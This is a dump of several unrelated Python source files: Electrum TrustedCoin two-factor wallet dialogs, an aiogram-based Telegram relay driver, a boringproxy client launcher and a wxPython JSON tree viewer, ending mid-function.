        wallet.handler_2fa.prompt_user_for_otp(wallet, tx, on_success, on_failure)
def waiting_dialog(self, window, on_finished=None):
task = partial(self.request_billing_info, window.wallet)
return WaitingDialog(window, 'Getting billing information...', task,
on_finished)
@hook
def abort_send(self, window):
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
if wallet.can_sign_without_server():
return
if wallet.billing_info is None:
self.start_request_thread(wallet)
window.show_error(_('Requesting account info from TrustedCoin server...') + '\n' +
_('Please try again.'))
return True
return False
    def settings_dialog(self, window):
        """Open the TrustedCoin settings once billing info has been fetched."""
        self.waiting_dialog(window, partial(self.show_settings_dialog, window))
    def show_settings_dialog(self, window, success):
        """Render the TrustedCoin information / prepay-billing dialog.

        `success` is the outcome of the preceding billing-info fetch; on
        failure only an error message is shown.
        """
        if not success:
            window.show_message(_('Server not reachable.'))
            return
        wallet = window.wallet
        d = WindowModalDialog(window, _("TrustedCoin Information"))
        d.setMinimumSize(500, 200)
        vbox = QVBoxLayout(d)
        hbox = QHBoxLayout()
        logo = QLabel()
        logo.setPixmap(QPixmap(":icons/trustedcoin-status.png"))
        msg = _('This wallet is protected by TrustedCoin\'s two-factor authentication.') + '<br/>'\
              + _("For more information, visit") + " <a href=\"https://api.trustedcoin.com/#/electrum-help\">https://api.trustedcoin.com/#/electrum-help</a>"
        label = QLabel(msg)
        label.setOpenExternalLinks(1)
        hbox.addStretch(10)
        hbox.addWidget(logo)
        hbox.addStretch(10)
        hbox.addWidget(label)
        hbox.addStretch(10)
        vbox.addLayout(hbox)
        vbox.addStretch(10)
        msg = _('TrustedCoin charges a small fee to co-sign transactions. The fee depends on how many prepaid transactions you buy. An extra output is added to your transaction every time you run out of prepaid transactions.') + '<br/>'
        label = QLabel(msg)
        label.setWordWrap(1)
        vbox.addWidget(label)
        vbox.addStretch(10)
        grid = QGridLayout()
        vbox.addLayout(grid)
        price_per_tx = wallet.price_per_tx
        n_prepay = wallet.num_prepay(self.config)
        i = 0
        # One radio-button row per prepay tier; tier 1 (pay-per-tx) is skipped.
        for k, v in sorted(price_per_tx.items()):
            if k == 1:
                continue
            grid.addWidget(QLabel("Pay every %d transactions:"%k), i, 0)
            grid.addWidget(QLabel(window.format_amount(v/k) + ' ' + window.base_unit() + "/tx"), i, 1)
            b = QRadioButton()
            b.setChecked(k == n_prepay)
            # k is bound as a default argument so each row keeps its own tier.
            b.clicked.connect(lambda b, k=k: self.config.set_key('trustedcoin_prepay', k, True))
            grid.addWidget(b, i, 2)
            i += 1
        n = wallet.billing_info.get('tx_remaining', 0)
        grid.addWidget(QLabel(_("Your wallet has {} prepaid transactions.").format(n)), i, 0)
        vbox.addLayout(Buttons(CloseButton(d)))
        d.exec_()
    def on_buy(self, window, k, v, d):
        """Start payment of `v` (satoshis) for `k` prepaid transactions."""
        d.close()
        if window.pluginsdialog:
            window.pluginsdialog.close()
        wallet = window.wallet
        # BIP21 payment URI for the billing address; amount converted to BTC.
        uri = "bitcoin:" + wallet.billing_info['billing_address'] + "?message=TrustedCoin %d Prepaid Transactions&amount="%k + str(Decimal(v)/100000000)
        wallet.is_billing = True
        window.pay_to_URI(uri)
        # Freeze the send-tab fields so the billing payment cannot be edited.
        window.payto_e.setFrozen(True)
        window.message_e.setFrozen(True)
        window.amount_e.setFrozen(True)
    def go_online_dialog(self, wizard):
        """Wizard step: explain that wallet creation must finish online."""
        msg = [
            _("Your wallet file is: {}.").format(os.path.abspath(wizard.storage.path)),
            _("You need to be online in order to complete the creation of "
              "your wallet. If you generated your seed on an offline "
              'computer, click on "{}" to close this window, move your '
              "wallet file to an online computer, and reopen it with "
              "Electrum.").format(_('Cancel')),
            _('If you are online, click on "{}" to continue.').format(_('Next'))
        ]
        msg = '\n\n'.join(msg)
        # Clear the wizard stack so "back" does not revisit earlier steps.
        wizard.stack = []
        wizard.confirm_dialog(title='', message=msg, run_next = lambda x: wizard.run('accept_terms_of_use'))
    def accept_terms_of_use(self, window):
        """Show the ToS (fetched on a worker thread) and collect an email.

        Blocks in `exec_layout` until the user accepts, then proceeds to
        remote key creation for the entered email address.
        """
        vbox = QVBoxLayout()
        vbox.addWidget(QLabel(_("Terms of Service")))
        tos_e = TOS()
        tos_e.setReadOnly(True)
        vbox.addWidget(tos_e)
        tos_received = False
        vbox.addWidget(QLabel(_("Please enter your e-mail address")))
        email_e = QLineEdit()
        vbox.addWidget(email_e)
        next_button = window.next_button
        prior_button_text = next_button.text()
        next_button.setText(_('Accept'))
        def request_TOS():
            # Runs on a worker thread; the result (or error) is marshalled
            # back to the Qt main thread through the TOS widget's signals.
            try:
                tos = server.get_terms_of_service()
            except Exception as e:
                import traceback
                traceback.print_exc(file=sys.stderr)
                tos_e.error_signal.emit(_('Could not retrieve Terms of Service:')
                                        + '\n' + str(e))
                return
            self.TOS = tos
            tos_e.tos_signal.emit()
        def on_result():
            tos_e.setText(self.TOS)
            nonlocal tos_received
            tos_received = True
            set_enabled()
        def on_error(msg):
            window.show_error(str(msg))
            window.terminate()
        def set_enabled():
            # "Accept" requires both a fetched ToS and a valid email address.
            next_button.setEnabled(tos_received and is_valid_email(email_e.text()))
        tos_e.tos_signal.connect(on_result)
        tos_e.error_signal.connect(on_error)
        t = Thread(target=request_TOS)
        t.setDaemon(True)
        t.start()
        email_e.textChanged.connect(set_enabled)
        email_e.setFocus(True)
        window.exec_layout(vbox, next_enabled=False)
        next_button.setText(prior_button_text)
        email = str(email_e.text())
        self.create_remote_key(email, window)
def request_otp_dialog(self, window, short_id, otp_secret, xpub3):
    """Wizard step asking for the Google Authenticator (TOTP) code.

    When otp_secret is given (fresh registration) a provisioning QR code
    is shown; otherwise the wallet is already registered and only the
    code is requested, with an option to reset a lost authenticator.
    """
    vbox = QVBoxLayout()
    if otp_secret is not None:
        # otpauth provisioning URI understood by authenticator apps.
        uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
        l = QLabel("Please scan the following QR code in Google Authenticator. You may as well use the following key: %s"%otp_secret)
        l.setWordWrap(True)
        vbox.addWidget(l)
        qrw = QRCodeWidget(uri)
        vbox.addWidget(qrw, 1)
        msg = _('Then, enter your Google Authenticator code:')
    else:
        label = QLabel(
            "This wallet is already registered with TrustedCoin. "
            "To finalize wallet creation, please enter your Google Authenticator Code. "
        )
        label.setWordWrap(1)
        vbox.addWidget(label)
        msg = _('Google Authenticator code:')
    hbox = QHBoxLayout()
    hbox.addWidget(WWLabel(msg))
    pw = AmountEdit(None, is_int = True)
    pw.setFocus(True)
    pw.setMaximumWidth(50)
    hbox.addWidget(pw)
    vbox.addLayout(hbox)
    cb_lost = QCheckBox(_("I have lost my Google Authenticator account"))
    cb_lost.setToolTip(_("Check this box to request a new secret. You will need to retype your seed."))
    vbox.addWidget(cb_lost)
    # The "lost authenticator" option only applies to existing registrations.
    cb_lost.setVisible(otp_secret is None)
    def set_enabled():
        # TOTP codes are 6 digits; the lost-account path needs no code.
        b = True if cb_lost.isChecked() else len(pw.text()) == 6
        window.next_button.setEnabled(b)
    pw.textChanged.connect(set_enabled)
    cb_lost.toggled.connect(set_enabled)
    window.exec_layout(vbox, next_enabled=False, raise_on_cancel=False)
    self.check_otp(window, short_id, otp_secret, xpub3, pw.get_amount(), cb_lost.isChecked())
|
driver.py | import threading
import asyncio
from typing import Dict, Union, List, Optional
from typing_extensions import Literal
from aiogram import Bot, Dispatcher, executor, types
from aiogram.types import ContentType
from unified_message_relay.Core.UMRType import UnifiedMessage, MessageEntity, ChatAttribute, ChatType, EntityType
from unified_message_relay.Core import UMRDriver
from unified_message_relay.Core import UMRLogging
from unified_message_relay.Core import UMRConfig
from unified_message_relay.Core.UMRMessageRelation import set_ingress_message_id, set_egress_message_id
from unified_message_relay.Util.Helper import unparse_entities_to_html
class TelegramDriverConfig(UMRConfig.BaseDriverConfig):
    """Config schema for one Telegram driver instance."""
    # Discriminator value selecting this driver type in the UMR config.
    Base: Literal['Telegram']
    # Bot token "<bot_user_id>:<secret>"; the numeric prefix is the bot's user id.
    BotToken: str
    # Optional HTTP proxy URL passed through to aiogram's Bot.
    HTTPProxy: Optional[str]


# Make this schema known to the UMR config loader.
UMRConfig.register_driver_config(TelegramDriverConfig)
class TelegramDriver(UMRDriver.BaseDriverMixin):
def __init__(self, name):
    """Create a Telegram driver instance named *name*.

    Reads this driver's section from the UMR config, creates a dedicated
    asyncio event loop, and constructs the aiogram Bot/Dispatcher pair.
    """
    super().__init__(name)
    self.name = name
    # Initialize bot and dispatcher
    self.logger = UMRLogging.get_logger(f'UMRDriver.{self.name}')
    self.logger.debug(f'Started initialization for {self.name}')
    self.config: TelegramDriverConfig = UMRConfig.config.Driver[self.name]
    # Token format is "<bot_user_id>:<secret>"; keep the numeric id handy.
    self.bot_user_id = int(self.config.BotToken.split(':')[0])
    self.image_file_id: Dict[str, str] = dict()  # mapping from filename to existing file id
    # Private event loop: all bot I/O is confined to this loop's thread.
    self.loop = asyncio.new_event_loop()
    self.loop.set_exception_handler(self.handle_exception)
    self.bot = Bot(token=self.config.BotToken, loop=self.loop, proxy=self.config.HTTPProxy)
    self.dp = Dispatcher(self.bot)
def start(self):
    """Start the driver: register message handlers and begin polling.

    Polling runs on the driver's private event loop inside a daemon
    thread, which is also registered in UMRDriver.threads.
    """
    def run():
        nonlocal self
        self.logger.debug('Running start')
        asyncio.set_event_loop(self.loop)

        # One handler covers both new and edited messages of any content type.
        @self.dp.message_handler(content_types=ContentType.ANY)
        @self.dp.edited_message_handler(content_types=ContentType.ANY)
        async def handle_msg(message: types.Message):
            from_user = message.from_user
            # Telegram group chat ids are negative; private chat ids positive.
            _chat_type = ChatType.GROUP if message.chat.id < 0 else ChatType.PRIVATE

            # Text messages carry .text; media messages carry .caption.
            if message.text:
                text = message.text
            elif message.caption:
                text = message.caption
            else:
                text = ''

            message_entities = self.parse_entities(message)

            unified_message = UnifiedMessage(platform=self.name,
                                             text=text,
                                             message_entities=message_entities,
                                             chat_id=message.chat.id,
                                             chat_type=_chat_type,
                                             name=from_user.full_name,
                                             user_id=from_user.id,
                                             message_id=message.message_id)
            self.get_chat_attributes(message, unified_message.chat_attrs)
            set_ingress_message_id(src_platform=self.name, src_chat_id=message.chat.id, src_chat_type=_chat_type,
                                   src_message_id=message.message_id, user_id=message.from_user.id)

            # Attach a media URL/file id for the supported media kinds.
            if message.content_type == ContentType.TEXT:
                pass
            elif message.content_type == ContentType.PHOTO:
                # photo[-1] is the largest available resolution.
                url, file_id = await self.tg_get_image(message.photo[-1].file_id)
                unified_message.image = url
                unified_message.file_id = file_id
            elif message.content_type == ContentType.STICKER:
                url, file_id = await self.tg_get_image(message.sticker.file_id)
                unified_message.image = url
                unified_message.file_id = file_id
            elif message.content_type == ContentType.ANIMATION:
                url, file_id = await self.tg_get_image(message.animation.file_id)
                unified_message.image = url
                unified_message.file_id = file_id
            else:
                unified_message.text = '[Unsupported message]'

            await self.receive(unified_message)

        # Blocks this (daemon) thread for the lifetime of the bot.
        executor.start_polling(self.dp, skip_updates=True, loop=self.loop)

    t = threading.Thread(target=run)
    t.daemon = True
    UMRDriver.threads.append(t)
    t.start()
    self.logger.debug(f'Finished initialization')
async def send(self, to_chat: Union[int, str], chat_type: ChatType, message: UnifiedMessage):
    """Schedule delivery of *message* to *to_chat* on the driver's event loop.

    Thread-safe entry point: wraps _send() with run_coroutine_threadsafe
    and returns the resulting concurrent.futures.Future. chat_type is
    accepted for interface compatibility but is not used here.
    """
    self.logger.debug('calling real send')
    return asyncio.run_coroutine_threadsafe(self._send(to_chat, message), self.loop)
async def _send(self, to_chat: int, message: UnifiedMessage):
    """Deliver *message* to Telegram chat *to_chat*.

    Renders the UnifiedMessage as HTML, sends it as text, photo or
    animation as appropriate, caches Telegram file ids for re-used
    images, and records the egress message id for message-relation
    tracking. Returns the Telegram message id of the sent message.
    """
    self.logger.debug('begin processing message')
    await self.bot.send_chat_action(to_chat, types.chat.ChatActions.TYPING)

    # Prefix the sender's name in bold, when known.
    if message.chat_attrs.name:
        text = '<b>' + message.chat_attrs.name + '</b>: '
    else:
        text = ''

    text += unparse_entities_to_html(message,
                                     EntityType.LINK | EntityType.STRIKETHROUGH | EntityType.UNDERLINE |
                                     EntityType.CODE_BLOCK | EntityType.BOLD | EntityType.ITALIC |
                                     EntityType.PLAIN | EntityType.CODE)

    if message.send_action.message_id:
        reply_to_message_id = message.send_action.message_id
    else:
        reply_to_message_id = None  # TODO support cross platform reply in the future

    if message.image:
        if message.image in self.image_file_id:
            # Re-use Telegram's cached file id instead of re-uploading.
            self.logger.debug(f'file id for {message.image} found, sending file id')
            if message.image.endswith('gif'):
                tg_message = await self.bot.send_animation(to_chat, self.image_file_id[message.image], caption=text,
                                                           parse_mode=types.message.ParseMode.HTML,
                                                           reply_to_message_id=reply_to_message_id)
            else:
                tg_message = await self.bot.send_photo(to_chat, self.image_file_id[message.image], caption=text,
                                                       parse_mode=types.message.ParseMode.HTML,
                                                       reply_to_message_id=reply_to_message_id)
        else:
            # First upload: send the file, then remember the id Telegram assigns.
            self.logger.debug(f'file id for {message.image} not found, sending image file')
            if message.image.endswith('gif'):
                tg_message = await self.bot.send_animation(to_chat, types.input_file.InputFile(message.image),
                                                           caption=text,
                                                           parse_mode=types.message.ParseMode.HTML,
                                                           reply_to_message_id=reply_to_message_id)
                self.image_file_id[message.image] = tg_message.document.file_id
            else:
                tg_message = await self.bot.send_photo(to_chat, types.input_file.InputFile(message.image),
                                                       caption=text,
                                                       parse_mode=types.message.ParseMode.HTML,
                                                       reply_to_message_id=reply_to_message_id)
                self.image_file_id[message.image] = tg_message.photo[-1].file_id
    else:
        self.logger.debug('finished processing message, ready to send')
        tg_message = await self.bot.send_message(to_chat, text, parse_mode=types.message.ParseMode.HTML,
                                                 reply_to_message_id=reply_to_message_id)

    if message.chat_attrs:
        # Record source-message -> sent-message mapping for reply threading.
        set_egress_message_id(src_platform=message.chat_attrs.platform,
                              src_chat_id=message.chat_attrs.chat_id,
                              src_chat_type=message.chat_attrs.chat_type,
                              src_message_id=message.chat_attrs.message_id,
                              dst_platform=self.name,
                              dst_chat_id=to_chat,
                              dst_chat_type=ChatType.GROUP if to_chat < 0 else ChatType.PRIVATE,
                              dst_message_id=tg_message.message_id,
                              user_id=self.bot_user_id)

    self.logger.debug('finished sending')
    return tg_message.message_id
def parse_entities(self, message: types.Message):
    """Convert Telegram message entities into UMR MessageEntity objects.

    Uses message.entities for text messages and message.caption_entities
    for media captions. Returns None when the message carries no entities.
    """
    if message.entities:
        entities = message.entities
    elif message.caption_entities:
        entities = message.caption_entities
    else:
        return None

    # Telegram entity type -> UMR entity type. Built once per call
    # (previously this dict literal was rebuilt on every loop iteration).
    # Types without a rich-text equivalent degrade to PLAIN.
    entity_map = {
        'mention': EntityType.BOLD,
        'hashtag': EntityType.PLAIN,
        'cashtag': EntityType.PLAIN,
        'bot_command': EntityType.PLAIN,
        'url': EntityType.PLAIN,
        'email': EntityType.PLAIN,
        'phone_number': EntityType.PLAIN,
        'bold': EntityType.BOLD,
        'italic': EntityType.ITALIC,
        'underline': EntityType.UNDERLINE,
        'strikethrough': EntityType.STRIKETHROUGH,
        'code': EntityType.CODE,
        'pre': EntityType.CODE_BLOCK,
        'text_mention': EntityType.BOLD,
        'text_link': EntityType.LINK
    }

    result = list()
    for entity in entities:
        # Only text links carry a URL payload.
        if entity.type == 'text_link':
            url = entity.url
        else:
            url = ''
        # Unknown entity types (e.g. 'spoiler' on newer Bot API versions)
        # previously raised KeyError and killed the handler; degrade to PLAIN.
        result.append(MessageEntity(start=entity.offset, end=entity.offset + entity.length,
                                    entity_type=entity_map.get(entity.type, EntityType.PLAIN),
                                    link=url))
    return result
async def tg_get_image(self, file_id) -> (str, str):
    """Resolve a Telegram file_id to a (download_url, permanent_id) pair.

    :param file_id: Telegram file id of a photo/sticker/animation.
    :return: tuple of the direct download URL and the file_unique_id.

    NOTE(review): the returned URL embeds the bot token — avoid logging it.
    """
    file: types.File = await self.bot.get_file(file_id)
    url = f'https://api.telegram.org/file/bot{self.config.BotToken}/{file.file_path}'
    # file_unique_id is stable across bots, unlike file_id.
    perm_id = file.file_unique_id
    return url, perm_id
def get_chat_attributes(self, message: types.Message, chat_attrs: ChatAttribute):
    """Populate forward/reply attributes on *chat_attrs* from *message*.

    Recurses into reply_to_message so nested reply chains are captured.
    """
    if message.forward_from_chat:  # forward from channel or user's private chat
        if message.forward_from_chat.title:
            # Channel: has a title and a forwarded message id, but no user id.
            name = message.forward_from_chat.title
            chat_id = message.forward_from_chat.id
            user_id = 0
            message_id = message.forward_from_message_id
        else:
            # Private chat: has a user but no forwarded message id.
            # NOTE(review): relies on forward_from_chat exposing full_name —
            # confirm this branch is only reached for private chats.
            name = message.forward_from_chat.full_name
            chat_id = message.forward_from_chat.id
            user_id = message.forward_from_chat.id
            message_id = 0
        # private message does not have message_id, and channel message does not have user_id
        chat_attrs.forward_from = ChatAttribute(platform=self.name,
                                                chat_id=chat_id,
                                                chat_type=ChatType.GROUP if message.chat.id < 0 else ChatType.PRIVATE,
                                                user_id=user_id,
                                                name=name,
                                                message_id=message_id)

    if message.forward_sender_name:
        # Sender hid their account: only the display name is available.
        chat_attrs.forward_from = ChatAttribute(platform=self.name,
                                                name=message.forward_sender_name)

    if message.forward_from:  # forward from user (group message)
        name = message.forward_from.full_name
        user_id = message.forward_from.id
        # forward message does not have message_id and chat_id
        chat_attrs.forward_from = ChatAttribute(platform=self.name,
                                                chat_type=ChatType.PRIVATE,
                                                chat_id=0,
                                                user_id=user_id,
                                                name=name)

    if message.reply_to_message:
        chat_attrs.reply_to = ChatAttribute(platform=self.name,
                                            chat_id=message.reply_to_message.chat.id,
                                            chat_type=ChatType.GROUP if message.reply_to_message.chat.id < 0 else ChatType.PRIVATE,
                                            name=message.reply_to_message.from_user.full_name,
                                            user_id=message.reply_to_message.from_user.id,
                                            message_id=message.reply_to_message.message_id)
        # Recurse: the replied-to message may itself be a forward or a reply.
        self.get_chat_attributes(message.reply_to_message, chat_attrs.reply_to)
async def is_group_admin(self, chat_id: int, chat_type: ChatType, user_id: int):
    """Return True iff *user_id* is the creator or an administrator of the group."""
    # Admin status is only meaningful in group chats.
    if chat_type != ChatType.GROUP:
        return False
    member = await self.bot.get_chat_member(chat_id, user_id)
    return bool(member) and member.status in ('creator', 'administrator')
async def is_group_owner(self, chat_id: int, chat_type: ChatType, user_id: int):
    """Return True iff *user_id* is the creator (owner) of the group."""
    # Ownership is only meaningful in group chats.
    if chat_type != ChatType.GROUP:
        return False
    member = await self.bot.get_chat_member(chat_id, user_id)
    return bool(member) and member.status == 'creator'
def handle_exception(self, loop, context):
    """Exception handler installed on the driver's private event loop."""
    # Per asyncio's contract, context["message"] is always present while
    # context["exception"] may be missing; fall back to the message.
    fallback = context["message"]
    exc = context.get("exception", fallback)
    self.logger.exception('Unhandled exception: ', exc_info=exc)
UMRDriver.register_driver('Telegram', TelegramDriver)
|
boringproxy_local_client.py | #!/usr/bin/env python3
import logging
import os
import subprocess
import threading
logger = logging.getLogger(__name__)


class BoringproxyLocalClient:
    """Manages a local `boringproxy client` subprocess.

    Starts the binary with the configured server/token/client-name and
    watches its output in a thread to auto-answer the interactive
    e-mail prompt boringproxy shows on first run.
    """

    BINARY_NAME = "boringproxy"

    def __init__(self, server_host, token, client_name, binary_path=None):
        """
        :param server_host: boringproxy server to connect to.
        :param token: auth token for the server.
        :param client_name: name this client registers under.
        :param binary_path: explicit path to the binary; when None, the
            well-known system binary folders are searched.
        """
        self.server_host = server_host
        self.token = token
        self.client_name = client_name
        self.binary_finder = BinaryFileFinder(self.BINARY_NAME)
        self.binary_path = binary_path if binary_path else self.binary_finder.get_binary_path()
        self.process = None
        self.output_checker_thread = None

    def start(self):
        """Spawn the client subprocess and start watching its output."""
        logger.debug(f"Starting '{self.client_name}' boringproxy local client")
        if not self.binary_path:
            logger.error(
                "Binary file for boringproxy local client could not be found")
            return
        command = [self.binary_path, "client", "-server", self.server_host,
                   "-token", self.token, "-client-name", self.client_name]
        # stderr is merged into stdout so the checker sees all output.
        self.process = subprocess.Popen(
            command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        self.output_checker_thread = threading.Thread(
            target=self.__output_checker)
        self.output_checker_thread.start()

    def stop(self):
        """Terminate the client subprocess, if running."""
        logger.debug(f"Stopping '{self.client_name}' boringproxy local client")
        if self.process:
            self.process.terminate()

    def restart(self):
        """Stop then start the client subprocess."""
        logger.debug(
            f"Restarting '{self.client_name}' boringproxy local client")
        self.stop()
        self.start()

    def __output_checker(self):
        """Read the subprocess output character by character.

        Logs complete lines and, when the "Email address: " prompt is
        detected, sends a newline so the process can proceed.
        """
        line = ''
        while self.process.returncode is None:
            character = self.process.stdout.read(1).decode("utf-8")
            if not character:
                # EOF: the process closed stdout (exited or was killed).
                # Without this check the loop would spin forever reading ''
                # since returncode is only updated by poll() below.
                break
            line += character
            if character == '\n':
                logger.debug(line)
                line = ''
            if "Email address: " in line:
                logger.info(
                    "Email input detected, sending new line character to access the license")
                self.process.stdin.write(b'\n')
                self.process.stdin.flush()
                break
        self.process.poll()
        logger.debug("Output checker has finished")
class BinaryFileFinder:
    """Locates an executable by name in a fixed list of system binary folders."""

    # Searched in order; the first existing file wins.
    BINARY_FOLDERS = [
        "/usr/bin",
        "/usr/sbin",
        "/usr/local/bin",
        "/usr/local/sbin"
    ]

    def __init__(self, binary_name):
        """:param binary_name: bare file name of the binary to look for."""
        self.binary_name = binary_name

    def get_binary_path(self):
        """Return the full path of the binary, or None when it is not found.

        (The None return is now explicit instead of falling off the end
        of the function.)
        """
        for folder in self.BINARY_FOLDERS:
            possible_path = f"{folder}/{self.binary_name}"
            if os.path.isfile(possible_path):
                return possible_path
        return None
|
wxRaven_JSON_Viewer_Logic.py | '''
Created on 6 mars 2022
@author: slinux
'''
from wxRavenGUI.application.wxcustom import *
from .wxRavenShellDesign import wxRaven_General_JSONViewer
import threading
import time
import sys,math
import json
import requests
import libs.pyperclip
import ast
class wxRaven_JSON_ViewerLogic(wxRaven_General_JSONViewer):
'''
classdocs
'''
view_base_name = "JSON Viewer"
view_name = "JSON Viewer"
parent_frame = None
default_position = "main"
icon = 'json_file_icon'#wx.Bitmap( u"res/default_style/normal/help_view.png", wx.BITMAP_TYPE_ANY )
def __init__(self, parentFrame, position = "main", viewName= "JSON Viewer", isInternalPluginView=False):
    '''
    Constructor.

    :param parentFrame: main application frame; provides RessourcesProvider,
        JobManager, Add(), GetPath(), etc.
    :param position: docking position used when registering the view.
    :param viewName: display name for this view instance.
    :param isInternalPluginView: when True the panel is embedded by a plugin
        or another view and must NOT be registered with the main app layout.
    '''
    super().__init__(parent=parentFrame)

    #
    # Your constructor here
    #
    self.view_base_name = "JSON Viewer"
    self.view_name = viewName
    self.parent_frame = parentFrame
    self.default_position = position

    # One option panel per input source; OnInputSourceChanged shows the
    # active one and hides the rest.
    self._allTabs= {
        'URL':self.m_optionpanel_url,
        'File':self.m_optionpanel_file,
        'Jobs':self.m_optionpanel_jobs,
        'RAW':self.m_optionpanel_raw,
    }
    self._currentInput= "URL"
    self._jobCache = {}
    self._currentJson = {}

    #self.imageList = None
    # Tree icons keyed by python type name (looked up in __appendElement__).
    _icons = {
        'json':parentFrame.RessourcesProvider.GetImage('json_tree_icon') ,
        'dict': parentFrame.RessourcesProvider.GetImage('dict_tree_icon'),
        'list': parentFrame.RessourcesProvider.GetImage('list_tree_icon'),
        'str': parentFrame.RessourcesProvider.GetImage('str_tree_icon'),
        'int': parentFrame.RessourcesProvider.GetImage('int_tree_icon'),
        'bool': parentFrame.RessourcesProvider.GetImage('int_tree_icon'),
        'float': parentFrame.RessourcesProvider.GetImage('int_tree_icon'),
        'unknown': parentFrame.RessourcesProvider.GetImage('unknown_tree_icon'),
        'class': parentFrame.RessourcesProvider.GetImage('class_tree_obj')
        #console_view.png
    }
    self.wxTree = wxRavenTreeView(self.m_treeListCtrl1, _icons, _fillTreeCallback=None, _onChangeCallback=self.onChangeTest)

    #This is to add the view in the appropriate place using the mainapp to do so
    #
    #The only exception is when the pannel itself is called by the plugin or another view
    #In this case the position in main app must not be managed (see rpc command panel as example)
    #
    if not isInternalPluginView:
        parentFrame.Add(self, self.view_name ,position, parentFrame.RessourcesProvider.GetImage(self.icon))
    #self.LoadSearchOptions()
    parentFrame.RessourcesProvider.ApplyThemeOnPanel(self)
    self.defaultRoot = parentFrame.GetPath('ROOT')
    #self.m_pythonSourceCodeExplorer.SetPath(self.defaultRoot)
    #self.m_pythonSourceCodeExplorer.SetDefaultPath(self.defaultRoot)
    #self.m_choice1.Bind(wx.EVT_CHOICE, self.OnInputSourceChanged)
    #self.m_pythonSourceCodeExplorer.Bind(wx.EVT_DIRCTRL_FILEACTIVATED, self.OnFileClicked)
    #
    # If your app need to load a bunch of data, it may want to wait the app is ready
    # specially at startup + resume of plugins
    # Use this thread method + callback to manage the 1sec/2sec init delay
    #
    #
    self.waitApplicationReady()
def OnClose(self, evt=None):
    """Called when the view is closed; nothing to clean up."""
    pass

def waitApplicationReady(self):
    """Defer panel setup until the main application reports it is ready."""
    t=threading.Thread(target=self.__waitLoop_T__, args=(self.setupPanel,))
    t.start()

def __waitLoop_T__(self,callback):
    # Worker thread: poll the app's ready flag every 2s, then run
    # *callback* on the GUI thread. The callback receives an empty tuple.
    while not self.parent_frame._isReady:
        time.sleep(2)
    wx.CallAfter(callback, ())

def setupPanel(self, evt=None):
    """One-time setup once the app is ready: sync the input-source panels."""
    self.OnInputSourceChanged()
def __appendElement__(self, elem, parentTree, strType):
    """Append one tree row for *elem* under *parentTree*.

    :param elem: the python value being displayed.
    :param parentTree: parent tree item to attach to.
    :param strType: label text for the first (name) column.
    :return: the newly created tree item.
    """
    elem_str = strType
    elem_type = str(type(elem).__name__)
    # Size column shows the size of the value's string representation.
    elem_size = self.convert_size(sys.getsizeof(str(elem)))
    # Icon chosen by type name; 'class' for other explorable objects,
    # 'unknown' as the last resort.
    _icon = self.wxTree.getImage('unknown')
    _matchIcon = self.wxTree.getImage(type(elem).__name__)
    if _matchIcon!=None:
        _icon = _matchIcon
    if _matchIcon == None and self.__isExplorableObject__(elem):
        _icon = self.wxTree.getImage('class')
    child = self.wxTree._tree.AppendItem(parentTree, elem_str)
    self.wxTree._tree.SetItemText(child, 1, elem_type)
    self.wxTree._tree.SetItemText(child, 2, elem_size)
    self.wxTree._tree.SetItemImage(child, closed=_icon, opened=_icon)
    return child
def __isExplorableObject__(self, objdata):
    """Return True when *objdata* should be expanded into child tree nodes.

    Scalars (numbers, strings, tuples, booleans) are leaves; everything
    else (dicts, lists, arbitrary objects) is considered explorable.
    """
    # Behavior-preserving simplification of the original isinstance chain:
    # the int check appeared twice, and bool is a subclass of int so the
    # separate bool check was redundant as well.
    return not isinstance(objdata, (int, float, complex, str, tuple))
def __exploreObject__(self, objJson, parent=None):
    """Recursively add *objJson* to the tree under *parent*.

    Dicts and lists get one child row per entry; other explorable
    objects are retried through their __json__() representation when
    available, falling back to a single leaf row.

    :param parent: parent tree item; None means attach to self.root.
    """
    if parent == None:
        parent = self.root
    #_icon = self.wxTree.getImage('unknown')
    if isinstance(objJson, dict):
        counter=0
        for _subKey in objJson:
            _subValue = objJson[_subKey]
            #_icon = self.wxTree.getImage('dict')
            if self.__isExplorableObject__(_subValue):
                child = self.__appendElement__(_subValue, parent, f"{_subKey}")
                self.__exploreObject__(_subValue, child)
            else:
                # Leaf: show "key : value" on a single row.
                child = self.__appendElement__(_subValue, parent, f'{_subKey} : {str(_subValue)}')
            counter = counter+1
    elif isinstance(objJson, list):
        counter=0
        for _subValue in objJson:
            #_icon = self.wxTree.getImage('list')
            if self.__isExplorableObject__(_subValue):
                child = self.__appendElement__(_subValue, parent, f"[{counter}]")
                self.__exploreObject__(_subValue, child)
            else:
                child = self.__appendElement__(_subValue, parent, f'[{counter}] : {str(_subValue)}')
            counter = counter+1
    elif self.__isExplorableObject__(objJson):
        try:
            # Objects exposing __json__() are expanded via that representation.
            objJsonRetry = objJson.__json__()
            self.__exploreObject__(objJsonRetry, parent)
        except Exception as e:
            child =self.__appendElement__(objJson, parent, f"{str(objJson)}")
        '''
        try:
            objJsonRetry = objJson.__repr__()
            self.__exploreObject__(objJsonRetry, parent)
        except Exception as e:
            pass
        #__json__
        '''
    else:
        child =self.__appendElement__(objJson, parent, f"{str(objJson)}")

def onChangeTest(self,evt):
    """Tree selection-change callback; currently a no-op placeholder."""
    toplabel = self.wxTree._currentText
def UpdateView(self, evt=None):
    """Rebuild the tree view from self._currentJson.

    Clears the tree, inserts a root item labelled with the current
    input source, then recursively populates it via __exploreObject__.
    """
    self.wxTree._tree.DeleteAllItems()
    # Give the name column 80% of the control's current width.
    w, h = self.wxTree._tree.GetSize()
    name_col_width = 0.8 * w
    self.wxTree._tree.SetColumnWidth(0, name_col_width)
    # Leftover debug print of the column width was removed here.
    self.root = self.wxTree._tree.InsertItem(self.wxTree._tree.GetRootItem(), wx.dataview.TLI_FIRST, self._currentInput)
    self.wxTree._tree.SetItemText(self.root, 1, str(type(self._currentJson)))
    self.wxTree._tree.SetItemText(self.root, 2, self.convert_size(sys.getsizeof(str(self._currentJson))))
    self.wxTree._tree.SetItemImage(self.root, closed=self.wxTree.getImage('json'), opened=self.wxTree.getImage('json'))
    # __exploreObject__ treats a None parent as "attach to self.root".
    self.__exploreObject__(self._currentJson, None)
def convert_size(self, size_bytes):
    """Return a human-readable size string for a byte count, e.g. 1536 -> '1.5 KB'."""
    if size_bytes == 0:
        return "0B"
    units = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
    # Pick the largest power of 1024 that fits, then scale down to it.
